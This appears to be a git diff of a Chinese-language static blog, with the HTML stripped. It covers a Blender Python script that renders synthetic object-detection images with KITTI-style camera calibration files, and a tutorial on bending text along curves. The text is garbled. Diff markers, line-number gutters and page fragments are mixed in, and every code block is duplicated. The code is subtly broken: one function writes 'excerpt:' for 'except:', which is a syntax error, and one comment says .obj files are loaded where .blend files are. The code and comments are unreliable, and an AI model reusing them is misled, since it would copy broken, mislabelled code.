    # Worlds changing frequency
    freq_CTW = 10
    objNameList = []
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    import bpy
    import math, mathutils
    import os, random
    import json
    import numpy as np

    mode = 'train' # FLAGS : train or val
    worldPath = 'pathToYourBackgrounds/'
    objsPath = 'pathToYour3DObjso/'
    imgPath = f'/home/xxx/Documents/myDataset/images/{mode}/'
    labelPath = f'/home/xxx/Documents/myDataset/labels/{mode}/'
    kittiCalibsPath = '/home/xxx/Documents/myDataset/kittiCalibs/'
    kittiLabelsPath = '/home/xxx/Documents/myDataset/kittiLabels/'

    picsNum = 2000
    # Number of objects in a scene
    objsNum = 4
    if objsNum > len(os.listdir(objsPath)):
    objsNum = len(os.listdir(objsPath))
    cameraLens = 15 # 相机焦距
    img_w = 960
    img_h = 540
    # Worlds changing frequency
    freq_CTW = 10
    objNameList = []

    main()

    1. 函数 clearAll(): 清空场景中所有的对象。
    2. @@ -430,28 +428,28 @@

      main()

    3. clearAll(): 清空场景中所有的对象。

    其中,labelIt(i) 这一部分是待实现的标注代码,用于对生成的渲染图像进行标注。

    -
    def main():
    clearAll()
    loadWorlds()
    loadObjs()
    loadCamera()
    scene = bpy.context.scene # 获取当前场景
    scene.camera = scene.objects['Camera'] # 将场景中的相机设置为所加载的相机
    scene.render.resolution_x = img_w # 设置输出图像的宽度
    scene.render.resolution_y = img_h # 设置输出图像的高度
    K = calibCamera() # 计算相机内部参数,即相机的内参矩阵
    changeTheWorld() # 改变场景环境(比如更改场景光照等),使得每张图片看起来不完全一样
    for i in range(picsNum): # 循环输出多张图片
    if i % freq_CTW == 0:
    changeTheWorld()
    changeObjs() # 改变场景中的物体位置和姿态,使得每张图片中物体的位置和姿态发生变换
    bougeLe() # 让场景中的物体随机移动一定距离(模拟物体在真实场景中的运动)
    snapIt(scene, i) # 对场景进行拍照,生成一张渲染后的图像
    labelIt(i) # <- TODO
    calId = f'{kittiCalibsPath}{i}.txt' # 写入参数
    with open(calId,'w',encoding='utf-8') as fc:
    for p in K:
    fc.writelines(p)
    #clearAll()
    if __name__ == '__main__':
    main()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    def main():
    clearAll()
    loadWorlds()
    loadObjs()
    loadCamera()
    scene = bpy.context.scene # 获取当前场景
    scene.camera = scene.objects['Camera'] # 将场景中的相机设置为所加载的相机
    scene.render.resolution_x = img_w # 设置输出图像的宽度
    scene.render.resolution_y = img_h # 设置输出图像的高度
    K = calibCamera() # 计算相机内部参数,即相机的内参矩阵
    changeTheWorld() # 改变场景环境(比如更改场景光照等),使得每张图片看起来不完全一样
    for i in range(picsNum): # 循环输出多张图片
    if i % freq_CTW == 0:
    changeTheWorld()
    changeObjs() # 改变场景中的物体位置和姿态,使得每张图片中物体的位置和姿态发生变换
    bougeLe() # 让场景中的物体随机移动一定距离(模拟物体在真实场景中的运动)
    snapIt(scene, i) # 对场景进行拍照,生成一张渲染后的图像
    labelIt(i) # <- TODO
    calId = f'{kittiCalibsPath}{i}.txt' # 写入参数
    with open(calId,'w',encoding='utf-8') as fc:
    for p in K:
    fc.writelines(p)
    #clearAll()
    if __name__ == '__main__':
    main()

    clearAll()

    删除场景中的所有对象:

    -
    def clearAll():
    for obj in bpy.data.objects:
    bpy.data.objects.remove(obj)
    for img in bpy.data.images:
    bpy.data.images.remove(img)
    for ma in bpy.data.materials:
    bpy.data.materials.remove(ma)
    for me in bpy.data.meshes:
    bpy.data.meshes.remove(me)
    for ng in bpy.data.node_groups:
    bpy.data.node_groups.remove(ng)
    for cd in bpy.data.cameras:
    bpy.data.cameras.remove(cd)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def clearAll():
    for obj in bpy.data.objects:
    bpy.data.objects.remove(obj)
    for img in bpy.data.images:
    bpy.data.images.remove(img)
    for ma in bpy.data.materials:
    bpy.data.materials.remove(ma)
    for me in bpy.data.meshes:
    bpy.data.meshes.remove(me)
    for ng in bpy.data.node_groups:
    bpy.data.node_groups.remove(ng)
    for cd in bpy.data.cameras:
    bpy.data.cameras.remove(cd)

    loadWorlds()

    world 是一系列 *.hdr 文件并存放在 worldPath 中,加载它们:

    -
    def loadWorlds():
    world = bpy.context.scene.world
    world.use_nodes = True
    enode = bpy.context.scene.world.node_tree.nodes.new('ShaderNodeTexEnvironment')
    worldFiles = os.listdir(worldPath)
    for file in worldFiles:
    bpy.data.images.load(worldPath + file)
    +
    1
    2
    3
    4
    5
    6
    7
    def loadWorlds():
    world = bpy.context.scene.world
    world.use_nodes = True
    enode = bpy.context.scene.world.node_tree.nodes.new('ShaderNodeTexEnvironment')
    worldFiles = os.listdir(worldPath)
    for file in worldFiles:
    bpy.data.images.load(worldPath + file)

    loadObjs()

    objs 是一系列 *.blend 文件并存放在 objsPath 中,加载它们:

    -
    def loadObjs():
    objsList = os.listdir(objsPath)
    for objName in objsList:
    file_path = os.path.join(objsPath, objName)
    objN = objName.split('.')[0] # 获取物体名称(去除后缀)
    objNameList.append(objN) # 将物体名称添加到物体名称列表中
    # 加载 .obj 文件并将其中包含的物体(对象)添加到当前场景中
    with bpy.data.libraries.load(file_path,link=False) as (data_from, data_to):
    # 只将以当前物体名称开头的对象添加到当前场景中,避免将不需要的对象添加到场景中
    data_to.objects = [name for name in data_from.objects if name.startswith(objN)]
    # 该部分是注释掉的代码,原本是想将已经加载的物体名称保存到 YAML 文件中,但是最终没有实现。
    #with open(cocoYaml,'w',encoding='utf-8') as fc:
    #yaml.dump(objNameList,fc)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def loadObjs():
    objsList = os.listdir(objsPath)
    for objName in objsList:
    file_path = os.path.join(objsPath, objName)
    objN = objName.split('.')[0] # 获取物体名称(去除后缀)
    objNameList.append(objN) # 将物体名称添加到物体名称列表中
    # 加载 .obj 文件并将其中包含的物体(对象)添加到当前场景中
    with bpy.data.libraries.load(file_path,link=False) as (data_from, data_to):
    # 只将以当前物体名称开头的对象添加到当前场景中,避免将不需要的对象添加到场景中
    data_to.objects = [name for name in data_from.objects if name.startswith(objN)]
    # 该部分是注释掉的代码,原本是想将已经加载的物体名称保存到 YAML 文件中,但是最终没有实现。
    #with open(cocoYaml,'w',encoding='utf-8') as fc:
    #yaml.dump(objNameList,fc)

    loadCamera()

    -
    def loadCamera():
    camera_data = bpy.data.cameras.new(name='Camera') # 创建一个新的相机对象
    camera_data.lens = cameraLens # 设置相机的焦距
    camera_object = bpy.data.objects.new('Camera', camera_data) # 绑定相机对象
    camera_object.rotation_euler[0] = math.pi / 2 # 使相机的 Z 轴朝向场景中的物体(而非朝上)
    bpy.context.scene.collection.objects.link(camera_object) # 将相机对象添加到场景中
    for obj in bpy.data.objects: # 循环遍历场景中的所有对象
    if obj.name != 'Camera': # 如果对象名称不是相机,则将其添加为相机的子对象,使得在相机移动时,所有与之相关的对象也会跟着移动
    obj.parent = bpy.data.objects['Camera']
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    def loadCamera():
    camera_data = bpy.data.cameras.new(name='Camera') # 创建一个新的相机对象
    camera_data.lens = cameraLens # 设置相机的焦距
    camera_object = bpy.data.objects.new('Camera', camera_data) # 绑定相机对象
    camera_object.rotation_euler[0] = math.pi / 2 # 使相机的 Z 轴朝向场景中的物体(而非朝上)
    bpy.context.scene.collection.objects.link(camera_object) # 将相机对象添加到场景中
    for obj in bpy.data.objects: # 循环遍历场景中的所有对象
    if obj.name != 'Camera': # 如果对象名称不是相机,则将其添加为相机的子对象,使得在相机移动时,所有与之相关的对象也会跟着移动
    obj.parent = bpy.data.objects['Camera']

    calibCamera()

    -
    def calibCamera():
    # 获取场景中名为 Camera 的相机对象,并获取该相机的数据对象
    cam = bpy.data.objects['Camera']
    camd = cam.data
    # 获取相机的焦距(单位:毫米)
    f_in_mm = camd.lens
    # 获取场景的参数,包括图像分辨率和缩放比例。
    # 其中 resolution_x_in_px 和 resolution_y_in_px 分别表示图像的宽度和高度(单位:像素),而 scale 表示缩放比例
    scene = bpy.context.scene
    resolution_x_in_px = scene.render.resolution_x
    resolution_y_in_px = scene.render.resolution_y
    scale = scene.render.resolution_percentage / 100
    # 获取相机的传感器宽度和高度(单位:毫米),以及像素纵横比
    sensor_width_in_mm = camd.sensor_width
    sensor_height_in_mm = camd.sensor_height
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    # 如果相机的传感器安装方式是垂直(即竖放),则传感器高度为固定值,宽度会随着像素纵横比的变化而变化;否则,传感器宽度为固定值,高度会随着像素纵横比的变化而变化
    if (camd.sensor_fit == 'VERTICAL'):
    # the sensor height is fixed (sensor fit is horizontal),
    # the sensor width is effectively changed with the pixel aspect ratio
    # 根据相机的传感器大小以及像素纵横比等参数,计算出两个尺度参数 s_u 和 s_v
    s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio
    s_v = resolution_y_in_px * scale / sensor_height_in_mm
    else: # 'HORIZONTAL' and 'AUTO'
    # the sensor width is fixed (sensor fit is horizontal),
    # the sensor height is effectively changed with the pixel aspect ratio
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    s_u = resolution_x_in_px * scale / sensor_width_in_mm
    s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm

    # Parameters of intrinsic calibration matrix K
    # 计算出相机的内参矩阵 K 中的元素,并分别放在 alpha_u、alpha_v、u_0、v_0 和 skew 变量中
    alpha_u = f_in_mm * s_u
    alpha_v = f_in_mm * s_v
    u_0 = resolution_x_in_px * scale / 2
    v_0 = resolution_y_in_px * scale / 2
    skew = 0 # only use rectangular pixels
    # K = Matrix(
    # ((alpha_u, skew, u_0),
    # ( 0 , alpha_v, v_0),
    # ( 0 , 0, 1 )))
    # 将内参矩阵 K 的各个元素和其他参数组成了一个矩阵(实际上只使用了矩阵中的第三行),并存储在名为 calList 的列表中。其中用到了 f-string 来方便地生成字符串。
    calList = [[f'P0: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'P1: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'P2: {alpha_u} {skew} {u_0} 0.0 0.0 {alpha_v} {v_0} 0.0 0.0 0.0 1.0 0.0\n'],
    [f'P3: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'R0_rect: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'Tr_velo_to_cam: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'Tr_imu_to_velo: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n']]
    return calList
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    def calibCamera():
    # 获取场景中名为 Camera 的相机对象,并获取该相机的数据对象
    cam = bpy.data.objects['Camera']
    camd = cam.data
    # 获取相机的焦距(单位:毫米)
    f_in_mm = camd.lens
    # 获取场景的参数,包括图像分辨率和缩放比例。
    # 其中 resolution_x_in_px 和 resolution_y_in_px 分别表示图像的宽度和高度(单位:像素),而 scale 表示缩放比例
    scene = bpy.context.scene
    resolution_x_in_px = scene.render.resolution_x
    resolution_y_in_px = scene.render.resolution_y
    scale = scene.render.resolution_percentage / 100
    # 获取相机的传感器宽度和高度(单位:毫米),以及像素纵横比
    sensor_width_in_mm = camd.sensor_width
    sensor_height_in_mm = camd.sensor_height
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    # 如果相机的传感器安装方式是垂直(即竖放),则传感器高度为固定值,宽度会随着像素纵横比的变化而变化;否则,传感器宽度为固定值,高度会随着像素纵横比的变化而变化
    if (camd.sensor_fit == 'VERTICAL'):
    # the sensor height is fixed (sensor fit is horizontal),
    # the sensor width is effectively changed with the pixel aspect ratio
    # 根据相机的传感器大小以及像素纵横比等参数,计算出两个尺度参数 s_u 和 s_v
    s_u = resolution_x_in_px * scale / sensor_width_in_mm / pixel_aspect_ratio
    s_v = resolution_y_in_px * scale / sensor_height_in_mm
    else: # 'HORIZONTAL' and 'AUTO'
    # the sensor width is fixed (sensor fit is horizontal),
    # the sensor height is effectively changed with the pixel aspect ratio
    pixel_aspect_ratio = scene.render.pixel_aspect_x / scene.render.pixel_aspect_y
    s_u = resolution_x_in_px * scale / sensor_width_in_mm
    s_v = resolution_y_in_px * scale * pixel_aspect_ratio / sensor_height_in_mm

    # Parameters of intrinsic calibration matrix K
    # 计算出相机的内参矩阵 K 中的元素,并分别放在 alpha_u、alpha_v、u_0、v_0 和 skew 变量中
    alpha_u = f_in_mm * s_u
    alpha_v = f_in_mm * s_v
    u_0 = resolution_x_in_px * scale / 2
    v_0 = resolution_y_in_px * scale / 2
    skew = 0 # only use rectangular pixels
    # K = Matrix(
    # ((alpha_u, skew, u_0),
    # ( 0 , alpha_v, v_0),
    # ( 0 , 0, 1 )))
    # 将内参矩阵 K 的各个元素和其他参数组成了一个矩阵(实际上只使用了矩阵中的第三行),并存储在名为 calList 的列表中。其中用到了 f-string 来方便地生成字符串。
    calList = [[f'P0: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'P1: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'P2: {alpha_u} {skew} {u_0} 0.0 0.0 {alpha_v} {v_0} 0.0 0.0 0.0 1.0 0.0\n'],
    [f'P3: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'R0_rect: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'Tr_velo_to_cam: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n'],
    [f'Tr_imu_to_velo: 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0\n']]
    return calList

    changeTheWorld()

    -
    def changeTheWorld():
    while True:
    # 随机选择一张 hdr 贴图
    wd = random.choice(bpy.data.images)
    if wd.name.endswith('hdr'):
    break
    # 将其设置为环境纹理贴图
    bpy.context.scene.world.node_tree.nodes['Environment Texture'].image = wd
    +
    1
    2
    3
    4
    5
    6
    7
    8
    def changeTheWorld():
    while True:
    # 随机选择一张 hdr 贴图
    wd = random.choice(bpy.data.images)
    if wd.name.endswith('hdr'):
    break
    # 将其设置为环境纹理贴图
    bpy.context.scene.world.node_tree.nodes['Environment Texture'].image = wd

    changeObjs()

    -
    def changeObjs():
    # 遍历场景中的所有物体,将它们从当前激活的 collection 中删除,除了名为 "Camera" 的相机
    for obj in bpy.context.collection.objects:
    if obj.name != 'Camera':
    bpy.context.collection.objects.unlink(obj)
    # 定义一个空列表 nameList
    nameList = []
    # 使用 while 循环随机选择场景中的物体,直到选择的数量达到 objsNum(objsNum 是一个变量,需要在函数之外定义),并将其添加到当前激活的 collection 中
    while len(nameList) < objsNum:
    obj = random.choice(bpy.data.objects)
    if not (obj.name in nameList) and obj.name != 'Camera':
    bpy.context.collection.objects.link(obj)
    nameList.append(obj.name)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    def changeObjs():
    # 遍历场景中的所有物体,将它们从当前激活的 collection 中删除,除了名为 "Camera" 的相机
    for obj in bpy.context.collection.objects:
    if obj.name != 'Camera':
    bpy.context.collection.objects.unlink(obj)
    # 定义一个空列表 nameList
    nameList = []
    # 使用 while 循环随机选择场景中的物体,直到选择的数量达到 objsNum(objsNum 是一个变量,需要在函数之外定义),并将其添加到当前激活的 collection 中
    while len(nameList) < objsNum:
    obj = random.choice(bpy.data.objects)
    if not (obj.name in nameList) and obj.name != 'Camera':
    bpy.context.collection.objects.link(obj)
    nameList.append(obj.name)

    bougeLe()

    -
    def bougeLe():
    # 遍历场景中的所有物体,对于除了名为 "Camera" 的相机对象之外的所有对象,将其选中,然后使用 while 循环计算一个比例尺来设置对象的位置
    for obj in bpy.data.objects:
    if obj.name != 'Camera':
    obj.select_set(True)
    # 使用 while 循环是因为在某些情况下,计算比例尺可能会出现异常而导致程序崩溃,因此使用 try 和 excerpt 语句可以让程序不断地重试直到成功为止
    while True:
    try:
    scale = math.sqrt(max(obj.dimensions)) * bpy.data.objects['Camera'].data.lens
    obj.location = (0, 0, -0.08 * scale)
    break
    excerpt:
    continue
    # 随机变换对象的位置、旋转和缩放,并传递一些参数来控制变换的幅度和随机性
    bpy.ops.object.randomize_transform(random_seed = random.randint(0, 100), loc=(0.24, 0.1, 0.05), rot=(3, 3, 3), scale=(1, 1, 1))
    else:
    # 对于名为 "Camera" 的相机对象,使用 random.uniform 方法生成随机的旋转角度,并将其赋值给对象的 Z 轴旋转角度,以模拟相机的扫描动态
    obj.rotation_euler[2] = 4 * random.uniform(-0.7, 0.7)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    def bougeLe():
    # 遍历场景中的所有物体,对于除了名为 "Camera" 的相机对象之外的所有对象,将其选中,然后使用 while 循环计算一个比例尺来设置对象的位置
    for obj in bpy.data.objects:
    if obj.name != 'Camera':
    obj.select_set(True)
    # 使用 while 循环是因为在某些情况下,计算比例尺可能会出现异常而导致程序崩溃,因此使用 try 和 excerpt 语句可以让程序不断地重试直到成功为止
    while True:
    try:
    scale = math.sqrt(max(obj.dimensions)) * bpy.data.objects['Camera'].data.lens
    obj.location = (0, 0, -0.08 * scale)
    break
    excerpt:
    continue
    # 随机变换对象的位置、旋转和缩放,并传递一些参数来控制变换的幅度和随机性
    bpy.ops.object.randomize_transform(random_seed = random.randint(0, 100), loc=(0.24, 0.1, 0.05), rot=(3, 3, 3), scale=(1, 1, 1))
    else:
    # 对于名为 "Camera" 的相机对象,使用 random.uniform 方法生成随机的旋转角度,并将其赋值给对象的 Z 轴旋转角度,以模拟相机的扫描动态
    obj.rotation_euler[2] = 4 * random.uniform(-0.7, 0.7)

    snapIt()

    -
    def snapIt(scene, idNum):
    for obj in bpy.data.objects:
    if obj.name != 'Camera':
    # 只选择相机
    obj.select_set(False)
    # 是通过将 imgPath 和 idNum 进行字符串拼接而得到的文件路径和文件名,用于保存渲染图像
    imId = f'{imgPath}{idNum}.png'
    scene.render.filepath = (imId)
    # 调用 bpy.ops.render.render 方法对场景进行渲染,最终将渲染结果保存为一个 PNG 格式的图像文件
    bpy.ops.render.render(write_still=True)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    def snapIt(scene, idNum):
    for obj in bpy.data.objects:
    if obj.name != 'Camera':
    # 只选择相机
    obj.select_set(False)
    # 是通过将 imgPath 和 idNum 进行字符串拼接而得到的文件路径和文件名,用于保存渲染图像
    imId = f'{imgPath}{idNum}.png'
    scene.render.filepath = (imId)
    # 调用 bpy.ops.render.render 方法对场景进行渲染,最终将渲染结果保存为一个 PNG 格式的图像文件
    bpy.ops.render.render(write_still=True)
    @@ -669,6 +667,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Blender-Text Effects In Blender (1-6)/index.html b/posts/Blender-Text Effects In Blender (1-6)/index.html index b395ad1d8e..55be36cd63 100644 --- a/posts/Blender-Text Effects In Blender (1-6)/index.html +++ b/posts/Blender-Text Effects In Blender (1-6)/index.html @@ -44,8 +44,6 @@ - - @@ -408,98 +406,98 @@

    资源

    课程

    Linux 下安装 bpy

    Releases · TylerGubala/blenderpy (github.com) 下载静态安装包,然后:

    -
    pip install bpy-2.91a0-cp37-cp37m-manylinux2014_x86_64.whl && bpy_post_install
    +
    1
    pip install bpy-2.91a0-cp37-cp37m-manylinux2014_x86_64.whl && bpy_post_install

    Create Curved Text In Blender | Bend Any Text | Part 1 in Text Effects | Two Easy Methods Explained

    创建文本对象

    1. 创建一个 Text 对象:

    png

    -
    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object
    +
    1
    2
    3
    4
    import bpy

    bpy.ops.object.text_add()
    text_obj = bpy.context.object
    1. 将这个 Text 对象的 Rotation XZ 设为 90°

    png

    -
    import numpy as np

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    +
    1
    2
    3
    4
    import numpy as np

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2
    1. 将文字设为居中对齐:

    png

    -
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    +
    1
    2
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"
    1. 将这个 TextGeometryExtrude 设为 0.1 m,使其具有厚度。

    png

    -
    text_obj.data.extrude = 0.1
    +
    1
    text_obj.data.extrude = 0.1
    1. 切换到 Edit Mode,可以更改其文字内容。

    png

    -
    text_obj.data.body = "Hello,\nWorld!"
    +
    1
    text_obj.data.body = "Hello,\nWorld!"

    直接弯曲

    1. Text 对象添加一个 Simple DeformModifier

    png

    -
    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")
    +
    1
    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")
    1. 设置其属性:

    png

    -
    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4
    +
    1
    2
    3
    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4

    得到弯曲后的文本:

    png


    完整代码:

    -
    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")

    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    import bpy
    import numpy as np

    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_modifier = text_obj.modifiers.new(name="Bend", type="SIMPLE_DEFORM")

    text_modifier.deform_method = "BEND"
    text_modifier.deform_axis = "Z"
    text_modifier.angle = np.pi / 4

    沿 Bezier 曲线弯曲

    1. 新建一个 Circle 对象,将其 Rotation Z 设为 90°

    png

    -
    bpy.ops.curve.primitive_bezier_circle_add()
    curve_obj = bpy.context.object

    curve_obj.rotation_euler[2] = np.pi / 2
    +
    1
    2
    3
    4
    bpy.ops.curve.primitive_bezier_circle_add()
    curve_obj = bpy.context.object

    curve_obj.rotation_euler[2] = np.pi / 2
    1. Text 对象添加一个 Modifier,选择 Curve,然后选择之前新建的 BezierCircle 对象:

    png

    -
    curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
    curve_modifier.object = curve_obj
    +
    1
    2
    curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
    curve_modifier.object = curve_obj

    此时 Text 对象就会沿着 BezierCircle 曲线变形:

    png

    1. 选中 BezierCircle 对象,切换到 Edit Mode,选择 SegmentsSwitch Direction,便可切换文字方向:

    png

    -
    bpy.ops.object.editmode_toggle()
    bpy.ops.curve.switch_direction()
    bpy.ops.object.editmode_toggle()
    +
    1
    2
    3
    bpy.ops.object.editmode_toggle()
    bpy.ops.curve.switch_direction()
    bpy.ops.object.editmode_toggle()
    1. 修改 BezierCircleScaleText 对象也会随之变化:

    png

    -
    curve_obj.delta_scale[0:3] = [2, 2, 2]
    +
    1
    curve_obj.delta_scale[0:3] = [2, 2, 2]

    完整代码:

    -
    import bpy
    import numpy as np

    # 新建一个 TextCurve 对象
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    # 修改文本位置和旋转角度
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    # 修改文本对齐方式
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    # 挤出文本
    text_obj.data.extrude = 0.1

    # 设置文本内容
    text_obj.data.body = "Hello,\nWorld!"

    # 创建一个圆形对象
    bpy.ops.curve.primitive_bezier_circle_add()
    curve_obj = bpy.context.object

    # 旋转该圆形对象
    curve_obj.rotation_euler[2] = np.pi / 2

    # 让文本沿着圆形变换
    curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
    curve_modifier.object = curve_obj

    # 修改方向
    bpy.ops.object.editmode_toggle()
    bpy.ops.curve.switch_direction()
    bpy.ops.object.editmode_toggle()

    # 修改圆形大小
    curve_obj.delta_scale[0:3] = [2, 2, 2]
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    import bpy
    import numpy as np

    # 新建一个 TextCurve 对象
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    # 修改文本位置和旋转角度
    text_obj.rotation_euler[0] = np.pi / 2
    text_obj.rotation_euler[2] = np.pi / 2

    # 修改文本对齐方式
    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    # 挤出文本
    text_obj.data.extrude = 0.1

    # 设置文本内容
    text_obj.data.body = "Hello,\nWorld!"

    # 创建一个圆形对象
    bpy.ops.curve.primitive_bezier_circle_add()
    curve_obj = bpy.context.object

    # 旋转该圆形对象
    curve_obj.rotation_euler[2] = np.pi / 2

    # 让文本沿着圆形变换
    curve_modifier = text_obj.modifiers.new(name="Curve", type="CURVE")
    curve_modifier.object = curve_obj

    # 修改方向
    bpy.ops.object.editmode_toggle()
    bpy.ops.curve.switch_direction()
    bpy.ops.object.editmode_toggle()

    # 修改圆形大小
    curve_obj.delta_scale[0:3] = [2, 2, 2]

    Add Text To Any Curved Surface In Blender | Part 2 in Text Effects | Blender Eevee & Cycles

    1. 新建一个茶壶:
    -
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_teapot_add()
    teapot_obj = bpy.context.object
    +
    1
    2
    3
    4
    5
    import bpy
    import numpy as np

    bpy.ops.mesh.primitive_teapot_add()
    teapot_obj = bpy.context.object
    1. 新建一个文本对象,设置其对齐、位置(使其靠近茶壶表面)、旋转、挤出、文字内容、行间距等:

    png

    png

    png

    -
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.location[1] = -2
    text_obj.location[2] = 1.5

    text_obj.rotation_euler[0] = np.pi / 2

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.space_line = 0.75
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    bpy.ops.object.text_add()
    text_obj = bpy.context.object

    text_obj.data.align_x = "CENTER"
    text_obj.data.align_y = "CENTER"

    text_obj.location[1] = -2
    text_obj.location[2] = 1.5

    text_obj.rotation_euler[0] = np.pi / 2

    text_obj.data.extrude = 0.1

    text_obj.data.body = "Hello,\nWorld!"

    text_obj.data.space_line = 0.75
    1. 给文字对象添加一个红色的材质,此时转到渲染窗口,文字就会呈现红色:

    png

    -
    text_material = bpy.data.materials.new(name="TextMaterial")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

    text_obj.data.materials.append(text_material)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    text_material = bpy.data.materials.new(name="TextMaterial")
    text_material.use_nodes = True
    nodes = text_material.node_tree.nodes
    principled_bsdf = nodes.get("Principled BSDF")
    if principled_bsdf is not None:
    principled_bsdf.inputs[0].default_value = (1, 0, 0, 1)

    text_obj.data.materials.append(text_material)
    1. 新建一个 EmptyCube,设置其位置使其和 Text 相同,设置其旋转角,用于控制 Text 的旋转:

    png

    -
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[1] = -2
    empty_obj.location[2] = 1.5

    empty_obj.rotation_euler[0] = np.pi / 2
    empty_obj.rotation_euler[2] = np.pi / 2
    +
    1
    2
    3
    4
    5
    6
    7
    8
    bpy.ops.object.empty_add(type="CUBE")
    empty_obj = bpy.context.object

    empty_obj.location[1] = -2
    empty_obj.location[2] = 1.5

    empty_obj.rotation_euler[0] = np.pi / 2
    empty_obj.rotation_euler[2] = np.pi / 2
    1. Text 对象添加 modifier:
    @@ -507,199 +505,199 @@

    -
    text_modifier_remesh = text_obj.modifiers.new(name="Remesh", type="REMESH")
    text_modifier_remesh.mode = "SHARP"
